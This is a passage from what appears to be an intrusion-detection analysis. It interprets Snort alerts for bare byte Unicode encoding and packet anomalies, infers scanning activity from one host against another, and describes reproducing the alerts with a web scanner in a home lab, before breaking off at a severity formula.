> [1] Bare byte encoding is an IIS trick that uses non-ASCII chars as valid values in decoding UTF-8 values. This is NOT in the HTTP standard, as all non-ASCII values have to be encoded with a %. Bare byte encoding allows the user to emulate an IIS server and interpret non-standard encodings correctly. There are no legitimate clients that encode UTF-8 this way, since it is non-standard.
>
> For more descriptions of the terms being used:
>
> Unicode is a single unified character set. Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language. [5]
>
> UTF-8 is a method to encode characters to Unicode (one of the three common encoding methods). UTF-8 encodes each Unicode character as a variable number of 1 to 4 octets. Using Unicode/UTF-8, you can write in emails and source code things such as Mathematics and Sciences or different languages.
>
> ASCII - ASCII code is the numerical representation of a character, because computers can only understand numbers. All non-ASCII characters usually get screwed up when output to the browser, such as some special characters or languages. UTF-8 supports ASCII characters but is not very good with non-ASCII characters.
>
> An HTTP connection to the web server will usually start with a request method such as GET or POST. All packets (except for the highlighted one) have started a 3-way handshake by initiating SYN to the web server. Somehow the highlighted packet was sent to the web server with the ACK flag set and without the request method. This does not follow RFC 2616 and triggers the Snort rule to alert.
> The result from Ethereal actually displays this packet as 'Continuation', which means there is no request in the packet.
>
> 5. Attack mechanism
>
> As I analyzed the combined log, I found that host 10.10.10.165 tried various attacks against host 192.168.17.68, including a TCP scan, a UDP scan, a SOCKS scan and probably a Unicode attack. Usually I would try to obtain correlating evidence from a secondary resource such as the web server to confirm the attack. However, the secondary resource is not available in this case and we only have the Snort log for less than 2 hours. With such limitations I would assume that the attack using Unicode, somehow, was used as part of the scanning process and one of the scanning policies happened to use the non-ASCII character that triggered the Snort rule to alert.
>
> To confirm my understanding, I set up a web server at home and wrote some e-commerce pages. Then I ran Snort with the same rule set and used N-Stealth, an HTTP Security Scanner, to scan the e-commerce application that I created. N-Stealth used various combinations of possible web application attacks and generated a lot of alerts, including 'bare byte Unicode encoding' alerts.
>
> 6. Correlations
>
> Bare byte Unicode encoding is considered under the Unicode attack category. The Unicode attack was previously raised by Bruce Schneier at http://www.schneier.com/crypto-gram-0007.html
>
> 7. Evidence of active targeting
>
> The attacker was trying to scan for vulnerable hosts. Host 192.168.17.68 was not the key target at first.
>
> 8. Severity
>
> Severity = (criticality + lethality) (system counte